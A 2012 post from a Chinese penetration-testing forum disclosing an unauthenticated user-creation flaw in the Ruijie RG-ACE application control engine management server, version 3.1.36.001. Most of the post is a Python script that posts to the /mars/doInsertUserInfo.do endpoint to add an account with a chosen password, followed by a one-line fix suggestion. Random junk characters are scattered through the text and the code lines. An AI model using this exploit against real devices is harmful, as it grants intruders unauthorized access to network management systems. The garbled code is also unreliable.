找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2563|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
9 _5 N! h) Q8 z. l; G1 ~
9 K, r* z3 p5 Y8 h. j2 o& y) Z" ]
测试的具体版本是
% I( {: B/ D( ?产品名称: 锐捷应用控制引擎
& @: l) v  F6 H/ |5 c; y版本号: 3.1.36.001 TC  {2 o" d# Q( v2 w$ N
编译时间: 201104291730
$ l) H2 h9 E: J
1 N  ]* }# R# V% H% T  s2 Q. W! o
漏洞证明:
. N/ I0 m3 q% e3 v* ^$ f& X 6 t( j4 @; R6 e4 y: j" n

: o$ b5 P7 i5 C" |; K+ C  w0 h9 |5 d& `' |, ^& G- ~" h0 f
: d* n) m; b+ m5 }

, j) [$ X! O) r. Y- P8 ?1 D2 J
" ?3 U. z2 N, L: z2 _3 i: l执行脚本
( z+ J& v+ p7 ^#! /usr/bin/env python1 K# E% O) k7 {( z% o& y
#coding=gbk
) d( Y% H2 A. I  Y. z2 s$ e6 V#RG-ACE管理服务器 V3.1.36.0018 Q  |4 w4 |; l7 b! q8 j
import urllib2, urllib,cookielib+ R% B$ r6 c2 t% v' j3 K
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 z9 |  m( X& Y! h/ Wopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))& N/ m# [* _) S; [! T; N5 D
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
; [2 K7 K" s9 g- r  U* o0 Qpost=(("event","userManager.doInsertUserInfo"),5 l% Y0 x2 _8 m6 D) p& s  R
("useractionname","addButtonValue"),
/ u: l0 ?  L6 y- o* ?% ~("useropermanager","userManager"),
! o2 v. z5 M8 b+ }("userName","t"), #######账号自己加
" l3 F+ T0 H0 j& m4 T3 ~4 t$ t("pwd","aaaaaa"),######密码自己加2 _" d4 U2 i$ v# C) E0 }" F
("trueName","ad"),$ V, u" x6 f! r! {2 W  Q9 f" ]
("email",""),
7 T! |. e4 N  L  w3 f("mobilePhone",""),
  a0 t- b) Y2 l! d7 k% S("officePhone",""),
9 `* V+ O. k' m, n) i. \) ~("addr",""),
  `/ Z  [+ Z% j' m% z- Q("submit","确定"))5 G3 e$ ^5 H# r/ k8 C" ]/ X
urllib2.install_opener(opener)
$ l5 X: M% D- gp=urllib2.urlopen(url, urllib.urlencode(post)).read(): u1 u0 T8 V( D# ^# q) ^- }0 u
print "Done"
3 ^2 j* R# w! i& w& e! j0 ~  C
" L) c1 j' I3 N登录,连接设备7 C" \; ]/ ?6 j  l/ i

$ F; g$ O! q7 c- ?6 H$ u% @' h3 B3 t/ Q! Z# N2 O
; {) |, V, y4 t0 s

! z4 M& l6 a( Y3 G9 L
/ x0 \4 t$ l0 {2 v; q7 e  v8 O1 u默认的管理员admin权限更大点
. r& R* |8 b" b8 \6 _" t/ A. O0 y5 j, ~% J$ k
6 ?( W$ @7 s: W: C! x' `' ?- ?; ]7 p
& i4 H+ }2 f' q% n
+ `; T8 c% q3 ]* f6 L
$ R. z# s3 p4 x$ ^& B) \( U$ F
修复方案:
4 D) W; \) X" g3 U- {加强对接口的权限验证3 _7 T' I8 E7 @8 z9 ^$ K
$ w3 l+ ~9 l+ ^" K; u9 F
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表